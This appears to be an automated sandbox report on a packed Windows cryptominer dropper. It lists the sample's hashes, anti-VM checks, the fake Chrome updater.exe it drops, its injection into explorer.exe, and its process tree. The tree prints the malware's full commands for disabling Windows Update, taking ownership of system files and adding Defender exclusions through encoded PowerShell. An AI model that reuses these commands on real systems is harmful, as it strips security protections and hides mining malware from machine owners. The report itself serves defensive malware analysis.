Analysis
- max time kernel: 302s
- max time network: 266s
- platform: windows10-1703_x64
- resource: win10-20220812-en
- resource tags: arch:x64, arch:x86, image:win10-20220812-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 23-08-2022 22:15

Behavioral task: behavioral1
- Sample: 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe
- Resource: win7-20220812-en

General
- Target: 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe
- Size: 7.0MB
- MD5: bd239d9eef85d149f36a7fe0bd2ba851
- SHA1: 4bec39f7dde972db05a9d5b632a1270835948939
- SHA256: 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f
- SHA512: 9cb49b81c3e0c98c6e6d9fbde42ddb635ea71e6230ee1ad6f39599ca991b45cd6f7b2c2775d8345bccb8cfb396b6952dbfe45e4531e18c28b2e709fe5424e6d2
- SSDEEP: 196608:Ss1EweUJOIkMdPU+W+RU5eltspYA+QPjBBQWHNGm:Ss1E9UkzM6e4v7obm
Malware Config

Signatures

Modifies security service (2 TTPs, 5 IoCs)
Processes: reg.exe
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 2 IoCs)
Processes: 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe, updater.exe
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (updater.exe)

XMRig Miner payload (6 IoCs)
Resources matched by YARA rule "xmrig":
- behavioral2/memory/4588-460-0x0000000140000000-0x0000000140809000-memory.dmp
- behavioral2/memory/4588-462-0x000000014036EAC4-mapping.dmp
- behavioral2/memory/4588-463-0x0000000140000000-0x0000000140809000-memory.dmp
- behavioral2/memory/4588-464-0x0000000140000000-0x0000000140809000-memory.dmp
- behavioral2/memory/4588-471-0x0000000140000000-0x0000000140809000-memory.dmp
- behavioral2/memory/4588-472-0x0000000140000000-0x0000000140809000-memory.dmp

Drops file in Drivers directory (2 IoCs)
Processes: conhost.exe
- File opened for modification: C:\Windows\system32\drivers\etc\hosts (conhost.exe)
- File opened for modification: C:\Windows\system32\drivers\etc\hosts (conhost.exe)

Executes dropped EXE (1 IoC)
Processes: updater.exe
- PID 188 updater.exe

Possible privilege escalation attempt (4 IoCs)
Processes: icacls.exe, takeown.exe
- PID 3540 icacls.exe
- PID 4032 takeown.exe
- PID 4004 icacls.exe
- PID 4804 takeown.exe

Stops running service(s) (3 TTPs)

Checks BIOS information in registry (2 TTPs, 4 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes: updater.exe, 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (updater.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (updater.exe)

Modifies file permissions (1 TTP, 4 IoCs)
Processes: takeown.exe, icacls.exe
- PID 4804 takeown.exe
- PID 3540 icacls.exe
- PID 4032 takeown.exe
- PID 4004 icacls.exe

Resources matched by YARA rule "themida":
- behavioral2/memory/2068-120-0x0000000000400000-0x0000000001056000-memory.dmp
- behavioral2/memory/2068-121-0x0000000000400000-0x0000000001056000-memory.dmp
- behavioral2/memory/2068-129-0x0000000000400000-0x0000000001056000-memory.dmp
- C:\Program Files\Google\Chrome\updater.exe
- C:\Program Files\Google\Chrome\updater.exe
- behavioral2/memory/188-262-0x0000000000400000-0x0000000001056000-memory.dmp
- behavioral2/memory/188-263-0x0000000000400000-0x0000000001056000-memory.dmp
- behavioral2/memory/188-265-0x0000000000400000-0x0000000001056000-memory.dmp

Checks whether UAC is enabled
Processes: 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe, updater.exe
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe)
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (updater.exe)

Drops file in System32 directory (4 IoCs)
Processes: powershell.EXE, powershell.exe, conhost.exe
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.EXE)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log (powershell.EXE)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log (conhost.exe)

Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes: 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe, updater.exe
- PID 2068 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe
- PID 188 updater.exe

Suspicious use of SetThreadContext (1 IoC)
Processes: conhost.exe
- PID 2316 (conhost.exe) set thread context of PID 4588 (explorer.exe)

Drops file in Program Files directory (3 IoCs)
Processes: powershell.exe, conhost.exe
- File created: C:\Program Files\Google\Chrome\updater.exe (powershell.exe)
- File opened for modification: C:\Program Files\Google\Chrome\updater.exe (powershell.exe)
- File created: C:\Program Files\Google\Libs\WR64.sys (conhost.exe)

Launches sc.exe (10 IoCs)
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe
- PID 1112 sc.exe
- PID 5088 sc.exe
- PID 4884 sc.exe
- PID 2612 sc.exe
- PID 3972 sc.exe
- PID 4256 sc.exe
- PID 4308 sc.exe
- PID 4236 sc.exe
- PID 2212 sc.exe
- PID 5100 sc.exe
Modifies data under HKEY_USERS (64 IoCs)
Modifies registry key (1 TTP, 18 IoCs)
Processes: reg.exe
- PIDs 4948, 4928, 3664, 4828, 4588, 4360, 4204, 4664, 2468, 5080, 3968, 2908, 2784, 4652, 1020, 4516, 4008, 2176 (all reg.exe)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: LoadsDriver (1 IoC)
- PID 624
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes
-
C:\Users\Admin\AppData\Local\Temp\4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe"C:\Users\Admin\AppData\Local\Temp\4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f.exe"2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAawBsAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAGoAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBlAG4AegBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAcwBsACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHkAZwByAGQAIwA+ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAAPAAjAHkAcwBvAGgAIwA+AA=="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAawBsAGQAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBsAGoAbwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBlAG4AegBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAcwBsACMAPgA="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe (depth 4)
  "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\system32\sc.exe (depth 5)
  sc stop UsoSvc
  - Launches sc.exe
C:\Windows\system32\sc.exe (depth 5)
  sc stop WaaSMedicSvc
  - Launches sc.exe
C:\Windows\system32\sc.exe (depth 5)
  sc stop wuauserv
  - Launches sc.exe
C:\Windows\system32\sc.exe (depth 5)
  sc stop bits
  - Launches sc.exe
C:\Windows\system32\sc.exe (depth 5)
  sc stop dosvc
  - Launches sc.exe
C:\Windows\system32\reg.exe (depth 5)
  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
  - Modifies registry key
C:\Windows\system32\reg.exe (depth 5)
  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
  - Modifies registry key
C:\Windows\system32\reg.exe (depth 5)
  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
  - Modifies registry key
C:\Windows\system32\reg.exe (depth 5)
  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
  - Modifies registry key
C:\Windows\system32\reg.exe (depth 5)
  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
  - Modifies registry key
C:\Windows\system32\takeown.exe (depth 5)
  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
  - Possible privilege escalation attempt
  - Modifies file permissions
C:\Windows\system32\icacls.exe (depth 5)
  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
  - Possible privilege escalation attempt
  - Modifies file permissions
C:\Windows\system32\reg.exe (depth 5)
  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
  - Modifies registry key
C:\Windows\system32\reg.exe (depth 5)
  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
  - Modifies registry key
C:\Windows\system32\reg.exe (depth 5)
  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
  - Modifies registry key
C:\Windows\system32\reg.exe (depth 5)
  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
  - Modifies registry key
C:\Windows\system32\schtasks.exe (depth 5)
  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe (depth 5)
  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe (depth 5)
  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
C:\Windows\system32\schtasks.exe (depth 5)
  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe (depth 5)
  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe (depth 5)
  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe (depth 5)
  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe (depth 4)
  "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe (depth 5)
  powercfg /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe (depth 5)
  powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe (depth 5)
  powercfg /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe (depth 5)
  powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe (depth 4)
  C:\Windows\System32\conhost.exe "duxiidbcn"
C:\Windows\explorer.exe (depth 4)
  C:\Windows\explorer.exe kjsoqgrdspbcfzi1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8akfEvBj2votiBG328vkx0bHTFFl8IR/D6WxVebpF3p5
  - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Program Files\Google\Chrome\updater.exe
  Filesize: 7.0MB
  MD5: bd239d9eef85d149f36a7fe0bd2ba851
  SHA1: 4bec39f7dde972db05a9d5b632a1270835948939
  SHA256: 4e6839cf01f72e598b673cebe7c733b88dd3aa26e83be649a4d646baa64c3b4f
  SHA512: 9cb49b81c3e0c98c6e6d9fbde42ddb635ea71e6230ee1ad6f39599ca991b45cd6f7b2c2775d8345bccb8cfb396b6952dbfe45e4531e18c28b2e709fe5424e6d2
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 8592ba100a78835a6b94d5949e13dfc1
  SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
  SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
  SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: ab1b6ad93b9e9348d162954800469dcf
  SHA1: 88cfe80e1a2609b1a7275e2f56e2eb1c4e20bde6
  SHA256: a00aadd40bec3adb4dd31fcc9bbd36cd07180072202723a816792fa9dfd15060
  SHA512: c8fe55cc1c3baedd57572261fe6dd24e1da3ed6b45724a2202e42d1c653ac57e7280467fc3ade8af4251a713464ec24d15f8b062105938d52bb201b8fb7f3c99
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 5d574dc518025fad52b7886c1bff0e13
  SHA1: 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
  SHA256: 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
  SHA512: 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: e2d46bffd1d9300639cac360fac02cb4
  SHA1: fd2b4813c8ab610294b6759192ca05bad5bb8958
  SHA256: 94ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3
  SHA512: 54b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535
- C:\Windows\system32\drivers\etc\hosts
  Filesize: 2KB
  MD5: c5227366b7a688ff23b01788718251aa
  SHA1: 9795262e79c832ba49c744fcd1b1794c0ffb5c6a
  SHA256: 789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
  SHA512: 8b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
- memory/188-264-0x00007FFE0D890000-0x00007FFE0DA6B000-memory.dmp (Filesize 1.9MB)
- memory/188-259-0x0000000000000000-mapping.dmp
- memory/188-265-0x0000000000400000-0x0000000001056000-memory.dmp (Filesize 12.3MB)
- memory/188-262-0x0000000000400000-0x0000000001056000-memory.dmp (Filesize 12.3MB)
- memory/188-263-0x0000000000400000-0x0000000001056000-memory.dmp (Filesize 12.3MB)
- memory/188-266-0x00007FFE0D890000-0x00007FFE0DA6B000-memory.dmp (Filesize 1.9MB)
- memory/500-250-0x0000000000000000-mapping.dmp
- memory/512-248-0x0000000000000000-mapping.dmp
- memory/528-470-0x0000000000000000-mapping.dmp
- memory/584-247-0x0000000000000000-mapping.dmp
- memory/1008-249-0x0000000000000000-mapping.dmp
- memory/1020-186-0x0000000000000000-mapping.dmp
- memory/1112-178-0x0000000000000000-mapping.dmp
- memory/1456-187-0x0000000000000000-mapping.dmp
- memory/1508-177-0x0000000000000000-mapping.dmp
- memory/1700-469-0x0000000000000000-mapping.dmp
- memory/1924-424-0x0000000000000000-mapping.dmp
- memory/2056-131-0x0000021034330000-0x000002103474E000-memory.dmp (Filesize 4.1MB)
- memory/2056-126-0x000002104F340000-0x000002104F75E000-memory.dmp (Filesize 4.1MB)
- memory/2068-129-0x0000000000400000-0x0000000001056000-memory.dmp (Filesize 12.3MB)
- memory/2068-121-0x0000000000400000-0x0000000001056000-memory.dmp (Filesize 12.3MB)
- memory/2068-128-0x00007FFE0D890000-0x00007FFE0DA6B000-memory.dmp (Filesize 1.9MB)
